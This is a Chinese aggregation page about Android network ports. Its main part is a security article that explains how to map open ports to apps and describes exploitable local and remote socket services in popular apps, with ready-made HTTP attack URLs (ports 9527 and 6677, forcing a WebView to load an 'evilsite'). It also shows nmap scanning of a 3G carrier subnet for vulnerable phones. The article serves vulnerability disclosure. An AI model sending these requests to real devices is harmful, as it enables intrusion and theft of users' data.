精华内容
下载资源
问答
  • 实用的安卓网络工具集,包含Ping、端口扫描等
  • android判断网络端口是否可达

    热门讨论 2012-10-14 00:21:29
    通过socket连接判断端口是否可达 如 127.0.0.1 8080
  • [网络信息安全]Android_App开放网络端口的安全风险 风险评估 安全体系 数据安全治理 红蓝对抗 工控安全
  • Android_App开放网络端口的安全风险 渗透测试 AI 安全威胁 培训与认证 红蓝对抗
  • pokeMMO安卓端登陆端口网络优化版,有需要的朋友可以下载
  • 之前分享过两款电脑上使用的网络工具,今天分享一个安卓手机上用的。之前的文章可以从下边的链接查看:(文章太长,之前的内容就不保留了,通过下边链接查看)LanSee:【PC工具】更新简单好...

     之前分享过两款电脑上使用的网络工具,今天分享一个安卓手机上用的。

    之前的文章可以从下边的链接查看:(文章太长,之前的内容就不保留了,通过下边链接查看)

    LanSee

    【PC工具】更新简单好用绿色IP地址扫描工具,内部网络设备查看工具,内网ip查询ip扫描工具,电脑IP地址查看方法

    telnet

    【PC工具】网站服务器端口检测工具,网络端口扫描工具,win10telnet安装方法

    Advanced_IP_Scanner

    【PC工具】可能是最好用最方便的内部网络设备查看工具,内网ip查询ip扫描工具

     

        玩路由器、NAS和树莓派的朋友经常需要查看内网设备ip地址。尤其是树莓派,一般情况不用桌面系统,登录SSH时候经常需要知道树莓派的ip地址。登录路由器可以查看到局域网内设备的ip地址,但很多情况下不方便登录路由器查看,比如在公司,路由器的管理员账户和密码都是保密的。

        传说:Fing Pro 是首屈一指的网络扫描工具:使用他们专利技术,检测连接了您的WiFi的所有设备并识别它们;全球各地的路由器制造商和杀毒软件公司都在使用他们的技术。

        软件版本:v8.9.1

        功能:内网设备IP地址查询,端口查询,ping,LAN唤醒(待测试),外网ip,运营商信息等等(网速测试好像用不了)

    ▼ 下载连接 ▼

    关注公众号【DLGG创客DIY】

    后台发送“内网IP”获取下载地址

    展开全文
  • 小荷才露尖尖角 · 2015/07/09 10:350x00 简介Android应用通常使用PF_UNIX、PF_INET、PF_NETLINK等不同domain的socket来进行本地IPC或者远程网络通信,这些暴露的socket代表了潜在的本地或远程攻击面,历史上也出现...

    小荷才露尖尖角 · 2015/07/09 10:35

    0x00 简介


    Android应用通常使用PF_UNIX、PF_INET、PF_NETLINK等不同domain的socket来进行本地IPC或者远程网络通信,这些暴露的socket代表了潜在的本地或远程攻击面,历史上也出现过不少利用socket进行拒绝服务、root提权或者远程命令执行的案例。特别是PF_INET类型的网络socket,可以通过网络与Android应用通信,其原本用于linux环境下开放网络服务,由于缺乏对网络调用者身份或者本地调用者pid、permission等细粒度的安全检查机制,在实现不当的情况下,可以突破Android的沙箱限制,以被攻击应用的权限执行命令,通常出现比较严重的漏洞。作为Android安全研究的新手,笔者带着传统服务器渗透寻找开放socket端口的思路,竟然也刷了不少漏洞,下面就对这种漏洞的发现、案例及影响进行归纳。

    0x01 Android开放端口应用定位


    简单地利用命令netstat就可以发现Android开放了许多socket端口,如图。但这些开放端口本后的应用却不得而知。

    此时可以通过三步定位法进行寻找([email protected]帖子),支持非root手机。

    第一步,利用netstat寻找感兴趣的开放socket端口,如图中的15555。

    第二步,将端口转换为十六进制值,查看位于/proc/net/目录下对应的socket套接字状态文件,在其中找到使用该socket的应用的uid。如15555的十六进制表示为1cc3,协议类型为tcp6,那么查看/proc/net/tcp6文件。

    注意上面的10115,就是使用该socket的应用的uid。通过这个uid可以得知应用的用户名为u0_a115。

    第三步,根据用户名就可以找到应用了

    至此,我们就知道开放15555端口的应用为com.qiyi.video,尽管我们还不能分辨出开放该端口的准确进程,但仍然为进一步的漏洞挖掘打下基础。

    写一个简单的脚本来自动化的完成此项工作.

    #!python
    import subprocess,re 
    
    def toHexPort(port):
        hexport = str(hex(int(port)))
        return hexport.strip('0x').upper()
    
    def finduid(protocol, entry):
        if (protocol=='tcp' or protocol=='tcp6'):
            uid = entry.split()[-10]
        else: # udp or udp6
            uid = entry.split()[-6]
        uid = int(uid)
        if (uid > 10000): # just for non-system app
            return 'u0_a'+str(uid-10000) 
        else:
            return -1
    
    def main():
        netstat_cmd = "adb shell netstat | grep -Ei 'listen|udp*'"
        #netstat_cmd = "adb shell netstat "
        grep_cmd = "adb shell grep" 
        proc_net = "/proc/net/"
    
    # step 1, find interesting port
        orig_output = subprocess.check_output(netstat_cmd, shell=True)
        list_line = orig_output.split('\r\n')
    
        apps = []
        strip_listline = []
        pattern = re.compile("^Proto") # omit the first line
    
        for line in list_line:
            if (line != '') and (pattern.match(line)==None):
    
    # step 2, find uid in /proc/net/[protocol] based on port 
                socket_entry = line.split()
                protocol = socket_entry[0]  
                port = socket_entry[3].split(':')[-1]
                grep_appid = grep_cmd+' '+ toHexPort(port)+' '+proc_net + protocol 
                net_entry = subprocess.check_output(grep_appid, shell=True)
                uid = finduid(protocol, net_entry)
    # step 3, find app username based on uid
                if (uid == -1): continue
                applist = subprocess.check_output('adb shell ps | grep '+uid, shell=True).split()
                app = applist[8]
                apps.append(app)
                strip_listline.append(line)
    
        itapp= iter(apps)
        itline=iter(strip_listline)
    # last, add app in orig_output of sockets
        print ("Package                  Proto Recv-Q Send-Q         Local Address          Foreign Address        State\r\n")
        try:
            while True:
                print itapp.next()+' '+itline.next()
        except StopIteration:
            pass
    
    if __name__ == '__main__':
        main()
    复制代码

    运行结果如下

    除了PF_INET套接字外,PF_UNIX、PF_NETLINK套接字的状态文件分别位于/proc/net/unix和/proc/net/netlink。

    当然,如果手机已root,可直接使用busybox安装目录下带p参数的netstat命令,可以显示pid和不完整的program name。

    0x02 漏洞挖掘实例


    得知某个应用开放某个端口以后,接下就可以在该应用的逆向代码中搜索端口号(通常是端口号的16进制表示),重点关注ServerSocket(tcp)、DatagramSocket(udp)等类,定位到关键代码,进一步探索潜在的攻击面,下面列举一些漏洞实例。

    1、敏感信息泄露、控制手机

    WooYun-2015-94537:某service打开udp的65502端口监听,接收特定的命令字后可返回手机的敏感信息,包括手机助手远程管理手机的SecretKey,进而未授权的攻击者可通过网络完全管理手机。

    CVE-2014-8757, LG On-Screen Phone预装App认证绕过漏洞。

    2、命令执行

    这类漏洞比较常见,通常通过开放socket端口传入启动android应用组件的intent,然后以被攻击应用的权限执行启动activity、发送广播等操作。由于通过socket传入的intent,无法对发送者的身份和权限进行细粒度检查,绕过了Android提供的对应用组件的权限保护,能够启动未导出的和受权限保护的应用组件,对安全造成影响。

    如果监听的端口是在本地,那么可能造成本地命令执行和权限提升,而如果监听的端口是任意地址,则可能造成比较严重的远程命令执行。

    3、本地命令执行:

    用前面端口应用定位的方法,发现某流行应用实现了一个小型的HTTP Server,监听本地的9527端口,简单搜索分析即可发现向该端口发送如下形式的HTTP请求时可执行命令。

    http://127.0.0.1:9527/si?cmp=<pacakgename>_<componentname>&data=<url scheme>&act=<action name>
    复制代码

    通过这个简单的HTTP请求,恶意程序就可以传入intent对象的包名、组件名、url和action,接收HTTP请求后执行命令的代码如下:

    #!java
    ...
            if(v3.hasNext()) {
                Object v6 = v3.next();
                if("act".equals(v6)) {
                    v4.setAction(v10.b.get(v6));
                }
                if("cmp".equals(v6)) {
                    String[] v9 = v10.b.get(v6).split("_");
                    if(v9 == null) {
                        goto label_39;
                    }
                    if(v9.length != 2) {
                        goto label_39;
                    }
                    v4.setComponent(new ComponentName(v9[0], v9[1]));
                }
    
            label_39:
    
                if("data".equals(v6)) {
                    v4.setData(Uri.parse(v10.b.get(v6)));
                }
    
                if(!"callback".equals(v6)) {
                    goto label_13;
                }
                Object v1_1 = v10.b.get(v6);
                goto label_13;
            }
    
            if((TextUtils.isEmpty(v4.getAction())) && v4.getComponent() == null && v4.getData() == null) {
    
                if(TextUtils.isEmpty(((CharSequence)v1))) {
                    return "{\"result\":-20000}";
                }
                return this.a(v1, "{\"result\":-20000}");
            }
            List v0 = this.a.getPackageManager().queryIntentActivities(v4, 0);
            if(v0.size() == 0) {
                if(TextUtils.isEmpty(((CharSequence)v1))) {
                    return "{\"result\":-10000}";
                }
                return this.a(v1, "{\"result\":-10000}");
            }
            try {
                this.a.startActivity(v4);
            }
    ...
    复制代码

    最终通过HTTP请求设置的Intent对象,传入了startActivity方法,由于需要用户干预,危害并不大。但当packagename指定为该应用自身,componentname指定为该应用的activity时,可以启动该应用的任意activity,包括受保护的未导出activity,从而对安全造成影响。例如,通过HTTP请求,逐一启动若干未导出的activity,可以发现拒绝服务漏洞、对安全有影响的登录界面和有一个可以该应用权限执行任意命令的GUI shell。

    远程命令执行:

    1. 趋势科技曾经发现过美团客户端漏洞,可以通过TCP的9527端口传入intent data,进而启动activity,见参考文献[1].

    2. 远程强制webview访问恶意链接

    定位到某流行应用实现了一个小型的HTTP Server,在tcp的6677端口监听任意地址,当HTTP请求满足一定条件时可以返回敏感信息,并根据请求消息执行一系列动作。对于该HTTP请求,仅有的防御措施是通过referer白名单的方式判断HTTP请求的来源。在正确设置referer,发送如下HTTP GET请求后

    http://ip:6677/command?param1=value1&...&paramn=valuen
    复制代码

    可获取手机的敏感信息和实现命令执行。其中command为getpackageinfo、androidamap、geolocation中的其一,见如下代码片段。

    (1)当command为geolocation时,可返回安装该应用手机地理位置信息;

    (2)当command为getpackageinfo时,默认返回该应用自身的版本信息。此时若指定参数param1为packagename,即请求http://ip:6677/getpackageinfo?packagename=xxx时(xxx为软件包名)可返回手机上安装的xxx所指定的任意软件包版本信息。若xxx为android,可返回android系统版本信息;

    (3)当command为androidamap时,设置Intent并将其广播出去,查看对应的OnReceive方法

    发现需要指定参数param1为action,即请求

    http://ip:6677/androidamap?action=yyy&param2=value2&...&paramn=valuen
    复制代码

    时,OnReceive方法取出前面广播intent对象的extra,新建一个intent对象,设置intent uri为

    androidamap://yyy?sourceApplication=web&param2=value2&...&paramn=valuen
    复制代码

    并以隐式intent的形式启动注册这种uri scheme的activiy。

    进一步搜索发现如下代码:

    #!java
    Uri v0_2 = Uri.parse("androidamap://openFeature?featureName=OpenURL&sourceApplication=banner&urlType=0&contentType=autonavi&url="
                                 + this.a.m.privilegeLink);
        Intent v1 = new Intent(MovieDetailHeaderView.c(this.a).getApplicationContext(), 
                                NewMapActivity.class);
        v1.setData(v0_2);
        v1.setFlags(268435456);
        MovieDetailHeaderView.c(this.a).startActivity(v1);
    复制代码

    表明可以通过远程HTTP GET请求如下地址

    http://ip:6677/androidamap?action=openFeature&featureName=OpenURL&sourceApplication=banner&urlType=0&contentType=autonavi&url=evilsite
    复制代码

    操纵安装该app的手机继承WebView的Activity访问evilsite,而且这里存在WebView的漏洞,利用方式包括

    (1). 窃取私有目录下的敏感文件:远程攻击者或者本地恶意app可以令WebView加载file://域的恶意脚本文件,按照恶意脚本的请求,窃取该应用私有目录下的敏感文件,突破android沙箱限制;

    (2). WebView远程命令执行:存在可被网页中js操纵的接口jsinterface。由于该流行应用针对的SDK版本较低(android:minSdkVersion="8"),在Android 4.4.2以下的手机,均可使用该接口,通过js注入该应用进程执行命令。

    0x03 漏洞利用场景


    对于Android app开放socket端口漏洞的远程利用场景,一般认为Android客户端都在内网,其利用主要还是在非安全的公共WiFi环境,通过对漏洞特征扫描即可利用。但在传统认为安全的移动互联网环境,笔者发现仍然可以扫描到其他开放端口的终端,因此也可以利用这种漏洞。

    叙述之前,我们先对典型的移动通信网络架构进行简单的科普,一般教科书上的3G网络架构(WCDMA)如图。

    包括以下组成部分:

    1. UE: 用户终端设备,就是手机,为用户提供电路域和分组域内的各种业务功能。

    2. UTRAN: 陆地无线接入网,分为基站(Node B)和无线网络控制器(RNC)两部分。

    3. CN: 核心网络,负责与其他网络的连接和对UE 的通信和管理。主要功能实体包括:

      (1) MSC/VLR:提供CS(电路交换)域的呼叫控制、移动性管理、鉴权和加密等功能;

      (2) GMSC:网关移动交换中心,充当移动网和固定网之间的移动关口局,承担路由分析、网间接续、网间结算等重要功能;

      (3) SGSN:GPRS服务支持节点,提供PS(分组交换)域的路由转发、移动性管理、会话管理、鉴权和加密等功能;

      (4) GGSN:网关GPRS支持节点,提供数据包在WCDMA 移动网和外部数据网之间的路由和封装,GGSN就好象是可寻址WCDMA移动网络中所有用户IP 的路由器,需要同外部网络交换路由信息。

      (5) HLR:归属位置寄存器,提供用户的签约信息存放、新业务支持、增强的鉴权等功能。

    4. External Networks:外部网络,包括ISDN和PSTN等电路交换网络,以及Internet等分组交换网络。

    简而言之,移动通信网络无非是大型的“局域网“,它们通过网关路由器(SGSN和GGSN)连上了Internet,进入到了互联网的世界。但是在某些移动通信网络的内部,不同的UE是可以互访的。以前面某应用开放6677端口为例,我们可以做一个简单的实验进行证明。

    使用联通3G网络,查看当前IP地址。

    在相邻C段进行扫描,扫描到开放端口的手机

    nmap -sT --open -p6677 10.160.112.0/24
    复制代码

    发现如下结果

    这证明在移动网络中,不同的UE可以互访。因此如果开放上述socket端口的app存在漏洞,在移动网络中也是可以利用的。

    0x04 小结


    对于客户端的远程漏洞利用,从攻击者的角度来看,通常更容易使用“受”的方法,即通过欺骗、劫持或社工的方法来让客户端访问我的攻击载荷。然而,从笔者发现的漏洞案例来看,许多Android应用不正确地使用网络socket端口传入命令进行跨进程通信,而且对于本地应用环境,网络socket也先天缺乏细粒度的认证授权机制,因此把Android客户端当做服务器,使用“攻”的方法,主动向开放端口发送攻击载荷也是可行的。这种漏洞一旦存在,轻则本地提权,重则为远程利用的高危漏洞,3G移动网络允许UE互访更是加剧了这种风险。

    此外,除PF_INET外,PF_UNIX、PF_NETLINK域的套接字也是值得关注的本地攻击面。

    参考文献:[1] http://blog.trendmicro.com/trendlabs-security-intelligence/open-socket-poses-risks-to-android-security-model

    展开全文
  • android出现该段错误:Unable to create Debug Bridge: Unable to start adb server: error: could not install *smartsocket* listener: cannot bind to 127.0.0.1:5037: 通常每个套接字地址(协议/网络地址/端口)只...

    android出现该段错误:

    Unable to create Debug Bridge: Unable to start adb server: error: could not install *smartsocket* listener: cannot bind to 127.0.0.1:5037: 通常每个套接字地址(协议/网络地址/端口)只允许使用一次。 (10048)

    could not read ok from ADB Server

    * failed to start daemon *

    error: cannot connect to daemon

    'D:\android_soft\Sdk\platform-tools\adb.exe start-server' failed -- run manually if necessary

    解决方案:在管理器中杀死adb.exe即可。

    学到的东西,在cmd中查看是哪个端口被占用,命令如下

    1.进入adb.exe 所在目录  (进入D盘,直接 “D:”)

    2. netstat -aon|findstr "5037"  , 查看端口被占用

    3.tasklist|findstr "5456" ,查看被占用的端口是哪个应用

    展开全文
  • Android机顶盒网络地址端口连通性测试 文章目录Android机顶盒网络地址端口连通性测试1、直接telnet2、busybox telnet3、测试工具 一般我们使用如下三种方式进行测试,前一种不满足则执行下一种: 1、外网可以访问时...

    Android机顶盒网络地址端口连通性测试

    一般我们使用如下三种方式进行测试,前一种不满足则执行下一种:

    • 1、外网可以访问时可以使用telnet直接进行ip及端口测试;
    • 2、外网无法访问只有机顶盒可以访问时可以使用busybox telnet进行测试;
    • 3、当外网无法访问且机顶盒不具备busybox telnet时可以使用我们开发的C工具进行测试,目前已经交叉编译适配机顶盒;

    1、直接telnet

    telnet host port
    

    如图所示:
    在这里插入图片描述

    2、busybox telnet

    busybox telnet ip port
    

    在这里插入图片描述
    似乎是不支持域名的:
    在这里插入图片描述

    3、测试工具

    在网上找了一个,简单的C写的socket通信,使用select进行监听:
    https://blog.csdn.net/pipalcn/article/details/83940054

    #include <stdio.h>
    #include <strings.h>
    #include <stdlib.h>
    #include <fcntl.h>
    #include <unistd.h>
    #include <sys/time.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    //#include <arpa/inet.h>
    #include <netinet/in.h>
    #include <errno.h>
    #include <netdb.h>
    
    #define TIMEOUT 5
    
    /*
    FileName:testConn.c
    functions:test host:port which specified whether is alive.
    call:testConn hostname port
    return values:
    0 :connected.
    1:arguments err.
    2:port number illegal.
    3:gethostname err.
    4:network setup err.
    5:Connect server timeout.
    */
    
    int main(int argc, char **argv)
    {
        if (argc != 3)
        {
            printf("error:Usage: %s host port.\nExample: %s 192.168.0.1 21\n", argv[0], argv[0]);
            exit(1);
        }
    
        int portnumber = 0;
        if ((portnumber = atoi(argv[2])) < 0)
        {
            fprintf(stderr, "error:port number[%s] is illegal.\n", argv[0]);
            exit(2);
        }
    
        struct hostent *host;
        if ((host = gethostbyname(argv[1])) == NULL)
        {
            fprintf(stderr, "error:Gethostname error\n");
            exit(3);
        }
    
        int sockfd, flags, res;
        struct sockaddr_in servaddr;
        fd_set fdr, fdw;
        struct timeval timeout;
    
        sockfd = socket(AF_INET, SOCK_STREAM, 0);
        if (sockfd < 0)
        {
            perror("error:Netwrok error...\n");
            return 4;
        }
    
        /* set socket fd noblock */
        if ((flags = fcntl(sockfd, F_GETFL, 0)) < 0)
        {
            perror("error:Netwrok error...\n");
            close(sockfd);
            return 4;
        }
    
        if (fcntl(sockfd, F_SETFL, flags | O_NONBLOCK) < 0)
        {
            perror("error:Network error...\n");
            close(sockfd);
            return 4;
        }
    
        bzero(&servaddr, sizeof(servaddr));
        servaddr.sin_family = AF_INET;
        //inet_pton(AF_INET, argv[1], &servaddr.sin_addr);
        servaddr.sin_addr = *((struct in_addr *)host->h_addr);
        servaddr.sin_port = htons(portnumber);
    
        if (connect(sockfd, (struct sockaddr *)&servaddr, sizeof(servaddr)) != 0)
        {
            if (errno != EINPROGRESS)
            { // EINPROGRESS
                perror("error:Network err....\n");
                close(sockfd);
                return 4;
            }
        }
        else
        {
            printf("Connected\n");
            return 0;
        }
    
        FD_ZERO(&fdr);
        FD_ZERO(&fdw);
        FD_SET(sockfd, &fdr);
        FD_SET(sockfd, &fdw);
    
        timeout.tv_sec = TIMEOUT;
        timeout.tv_usec = 0;
    
        res = select(sockfd + 1, &fdr, &fdw, NULL, &timeout);
        if (res < 0)
        {
            perror("error:Network error...\n");
            close(sockfd);
            return 4;
        }
        if (res == 0)
        {
            printf("error:Connect server timeout\n");
            close(sockfd);
            return 5;
        }
        if (res == 1)
        {
            if (FD_ISSET(sockfd, &fdw))
            {
                printf("Connected\n");
                close(sockfd);
                return 0;
            }
        }
        /* Not necessary */
        if (res == 2)
        {
            printf("error:Connect server timeout\n");
            close(sockfd);
            return 5;
        }
    
        printf("error:Connect server timeout\n");
        close(sockfd);
        return 5;
    }
    

    之后我们将其交叉编译后放到Android机顶盒中运行即可:
    在这里插入图片描述

    展开全文
  • 二、网络ADB调试:1.Android设备除了用有线usb进行ADB调试外,还可以在同一局域网通过网络ADB连接,一般指令为 adb connect 192.168.2.36(此为当前Android设备网络IP),默认监听端口为5555,因此指令实际效果为 adb....
  • 做了Android开发这么久了,经常会遇到一个问题是adb端口被占用,大家都知道Android默认的adb端口是5037,电脑上有一些应用的端口,又恰巧与adb端口冲突占用掉了 早起本人的做法的是: 查看端口是否被占用:运行:...
  •  第一次遇到这个问题,上网查了一下原因,原来”The connection to adb is down, and a severe error has occured”指的就是Android模拟器端口被占用了。 二、问题的排查过程  既然是端口被占用了,现在就要看看...
  • Android : 网络adb配置及有线端口占用解决方法
  • 因为项目需求 需要在请求服务器时修改默认的端口号,我用的是https请求,来个大神教我一下啊
  • Android 查询端口

    千次阅读 2015-03-20 16:20:13
    转载:http://zhidao.baidu.com/link?url=jGNMLiOUWbtEHC-i5OykyFC9fZs3UJ6p2tNcsOHa1Sb5EtQmj1JfBdey8Ls0m2vdaElb3_BOYyp9Fu11Ps4WkcFKXiVzDjeZC7cgD-NuRqK ...先执行adb nodaemon server ,查看adb server
  • 实现android中IP和端口的重定向,输入原始IP,端口和目标IP,端口,实现重定向功能
  • Android 判断IP地址及端口是否正确

    万次阅读 2021-03-17 18:18:53
    在进行网络编程时,端口或者IP的不正确会导致应用挂掉,通过以下方法可以对端口或者IP进行判断是否合法。 二、解决思路 1.端口判断 端口的有效范围在 0 ~ 65535之间,写一个判断方法即可。 2. IP判断 这儿的IP指IPv4...
  • 相信大家做过安卓开发或者安卓自动化测试开发的都离不开adb这个Android Debug Bridge这个工具,该工具有个很重要的功能就是端口转发。比如你在目标安卓机器端建立了一个服务来处理获取当前界面元素,监听的是设备本...
  • * 端口:IP地址是用来区分计算机,那么端口就是来区分计算机里的软件的。 * 端口是一个虚拟的概念,不代表主机里真的有多个端口端口表示的是 * 一个16位的二进制整数,2个字节,对应十进制的0-65535,两个传输...
  • 或者提示cannot bind to 127.0.0.1:5037: 通常每个套接字地址(协议/网络地址/端口)只允许使用一次。 每次都要重启才会有作用,在网上查找之后发现解决办法 解决adb端口被占用的方法: 1.查看占用端口的...
  • 安卓的通过命令netstat的的查看应用访问过的IP和端口 Linux的中的的用netstat是一款命令行工具,可用于列出系统上所有的网络套接字连接情况,包括TCP,UDP以及UNIX套接字,另外它还能列出处理监听状态(即等待接入...
  • netstat命令的功能是显示网络连接、路由表和网络接口信息命令格式:netstat [选项]查看命令帮助:netstat -help 查看所有的端口占用情况netstat -ano 查看指定端口的占用情况:netstat -aon|findstr "端口号"比如我...
  • 发现到存活的IP以后,那么下一步就是针对特定的主机进行端口扫描了,因为端口对应的是网络服务及其应用段的程序,一旦发现开放的端口,便可以借此进行渗透。假设ICMP 返回port-unreachable 响应代表端口关闭,但是...
  • com.Android.ddmlib.AdbCommandRejectedException:device offline;...cannot bind to 127.0.0.1:5037: 通常每个套接字地址(协议/网络地址/端口)只允许使用一次。 (10048) 安卓端口被占用最新的解决办法127.0.0.
  • Fwd:端口转发应用程序可让您使用Android设备的网络接口通过栓系连接转发端口,非常适合托管服务器或打开NAT类型进行游戏。 Fwd旨在促进从Android设备轻松便捷地进行端口转发。 对于对端口转发感兴趣的网络爱好者...
  • 对于 1024以内的端口,默认只提供给系统使用,外部应用是没有权限使用的,如果想要外部访问不带8080 ,则需要在服务端,设置一条如下iptable 指令;把端口号设置为80就可以省略不写。 iptables -t nat -A ...
  • android adb 端口转发

    万次阅读 2011-12-05 17:00:29
    之前,以为android模拟器只能作为client来对待,不能创建socket server来接收数据,原因是用tcpview看了一下,创建的监听端口,并没有显示, 所以,后来,就打算用vc直接开发一个daemon程序来接收请求,同时转发...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 45,359
精华内容 18,143
关键字:

安卓网络端口查看